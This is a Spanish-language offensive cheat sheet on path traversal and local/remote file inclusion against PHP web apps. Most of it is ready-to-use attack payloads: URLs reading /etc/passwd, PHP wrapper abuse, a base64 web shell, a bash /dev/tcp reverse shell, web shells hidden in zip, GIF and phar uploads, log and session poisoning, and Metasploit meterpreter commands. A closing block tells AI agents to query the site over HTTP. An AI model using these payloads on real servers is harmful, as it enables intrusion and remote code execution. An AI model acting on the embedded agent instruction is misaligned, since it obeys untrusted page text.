# Path traversal & file inclusion ## Path traversal ```sh http:///index.php?page=../../..// http:///index.php?page=../../../etc/passwd http:///index.php?page=../../../windows/win.ini ``` ### Null byte Omite la adición de caracteres al final de la cadena proporcionada. ```sh http:///index.php?page=../../../etc/passwd%00 ``` ## Local File Inclusion (LFI) ### Payloads #### Linux/Unix * * #### Windows * **SecLists** * ### Fuerza bruta #### Wfuzz ```sh wfuzz -u http:///index.php?page=../../../../../../FUZZ -w --hw 0 -c ``` * -u = URL. * \ = objetivo. * FUZZ = la palabra `FUZZ` será reemplazada con los valores de la wordlist. * -w = wordlist. * \ = ruta de wordlist Local File Inclusion (LFI). * \--hw 0 = ocultar respuestas con 0 (cero) palabras. * -c = output con colores. #### FFuF ```sh ffuf -u http:///index.php?page=FUZZ -w :FUZZ ``` * -u = URL. * \ = objetivo. * FUZZ = la palabra `FUZZ` será reemplazada con los valores de la wordlist. * -w = wordlist. * \ = ruta de wordlist. ### PHP wrappers #### Wrapper php\://filter ```sh # base64 http:///index.php?page=php://filter/read=convert.base64-encode/resource=../../..// # ROT13 http:///index.php?page=php://filter/read=string.rot13/resource=../../..// ``` #### Wrapper data:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ```sh http:///index.php?page=data://text/plain, http:///index.php?page=data://text/plain, ``` ### Local File Inclusion (LFI) a Remote Code Execution (RCE) #### Wrapper expect:// Este wrapper está deshabilitado de forma predeterminada. ```sh http:///index.php?page=expect://id ``` #### Wrapper input:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ```sh curl -s -X POST --data "" "http:///index.php?page=php://input" | grep uid ``` {% code title="Request" %} ``` POST /index.php?page=php://input Host: ``` {% endcode %} #### Wrapper data:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ``` http:///index.php?page=data://text/plain, http:///index.php?page=data://text/plain;base64, ``` Ejemplo de web shell (base64). ```sh # Web shell (PHP) echo '' | base64 # Web shell (PHP) en base64 PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= # Payload final http:///index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id ``` Ejemplo de reverse shell (base64). ```sh # Reverse shell (Bash) bash -c 'bash -i >& /dev/tcp// 0>&1' # Reverse shell (Bash) en base64 YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC97SVAtQWRkcmVzc30ve3BvcnR9IDA+JjEn # Payload final http:///index.php?page=data://text/plain;base64,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC97SVAtQWRkcmVzc30ve3BvcnR9IDA+JjEn ``` #### File upload 1\) Wrapper zip\:// Generación de archivo `.zip` con web shell. ```sh echo '' > webshell.php zip webshell.zip webshell.php rm webshell.php ``` Subir archivo `webshell.zip` al servidor web objetivo. Es posible hacer referencia a los archivos dentro del archivo `webshell.zip` con el simbolo `#`. ```sh # Sin URL encode http:///index.php?page=zip://webshell.zip#cmd.php&cmd=id # Con URL endoce http:///index.php?page=zip://webshell.zip%23cmd.php&cmd=id ``` 2\) Archivo de imagen. Generación de archivo `webshell.gif` con web shell. ```sh echo 'GIF8' > webshell.gif ``` Subir archivo `webshell.gif` al servidor web objetivo y realizar su ejecución desde el Local File Inclusion (LFI) identificado. ```sh http:///index.php?page=webshell.gif&cmd=id ``` 3\) Wrapper phar:// {% code title="webshell.php" %} ```php startBuffering(); $phar->addFromString('webshell.txt', ''); $phar->setStub(''); $phar->stopBuffering(); ?> ``` {% endcode %} Generación de archivo `.phar` desde `webshell.php` y cambio de extensión a `.jpg`. ```sh php --define phar.readonly=0 webshell.php mv webshell.phar webshell.jpg ``` Subir archivo `webshell.jpg` al servidor web objetivo y realizar su ejecución desde el Local File Inclusion (LFI) identificado. ```sh http:///index.php?page=phar://webshell.jpg/webshell.txt&cmd=id ``` #### Log poisoning Archivos de logs: * /var/log/apache2/access.log * /var/log/nginx/access.log * /var/log/sshd.log * /var/log/mail * /var/log/vsftpd.log * /proc/self/environ {% code title="Request" %} ``` GET /index.php?page= Host: User-Agent: ``` {% endcode %} ```sh http:///index.php?page=&cmd=id ``` #### Archivos de sesión de PHP Rutas de almacenamiento de archivos de sesión de PHP: * /var/lib/php/sessions/ * C:\Windows\Temp Ejemplo para `PHPSESSID` con valor `ujllfv2j2sm7ae11is401hvdf9`. ```sh http:///index.php?page=/sess_ujllfv2j2sm7ae11is401hvdf9 ``` Modificación de alguno de los valores almacenados en la sesión por: ```php ``` Ejecución de comandos. ```sh http:///index.php?page=/sess_ujllfv2j2sm7ae11is401hvdf9&cmd=id ``` ## Remote File Inclusion (RFI) Para incluir un archivo remoto en PHP, las opciones `allow_url_fopen` (habilitada de forma predeterminada) y `allow_url_include` deben estar activadas en la configuración. ```sh http:///index.php?page=http:// http:///index.php?page=http://www.google.com ``` ### Remote File Inclusion (RFI) a Remote Code Execution (RCE) Creación de webshell. {% code title="webshell.php" %} ```php ``` {% endcode %} #### HTTP Habilitación de servidor HTTP para compartir el archivo `webshell.php`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Ejecución de comandos. ```sh http:///index.php?page=http:///webshell.php&cmd=id ``` #### FTP Habilitación de servidor FTP para compartir el archivo `webshell.php`. ```sh python3 -m pyftpdlib -p 21 ``` Ejecución de comandos. ```sh http:///index.php?page=ftp:///webshell.php&cmd=id ``` #### SMB Cuando la aplicación se ejecuta en Windows, las restricciones aplicadas por `allow_url_include` pueden omitirse mediante el uso del protocolo SMB. Esto se debe a que Windows trata los archivos de los servidores SMB remotos como archivos normales, a los que se puede hacer referencia directamente con una ruta UNC (Universal Naming Convention). Habilitación de servidor SMB para compartir el archivo `webshell.php`. ```sh impacket-smbserver -smb2support share $(pwd) ``` Ejecución de comandos. ```sh http:///index.php?page=\\\webshell.php&cmd=id ``` ### Metasploit ```sh msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > shell.exe ``` ```sh use unix/webapp/php_include set RHOST set PHPURI /index.php?page=XXpathXX set PAYLOAD php/meterpreter/reverse_tcp set LHOST set LPORT 4444 exploit # Desde sesión de meterpreter upload shell.exe ``` ```sh use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST set LPORT 5555 exploit -j ``` ```sh use unix/webapp/php_include set PAYLOAD php/exec set CMD shell.exe exploi ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://web.mrw0l05zyn.cl/explotacion/path-traversal-and-file-inclusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.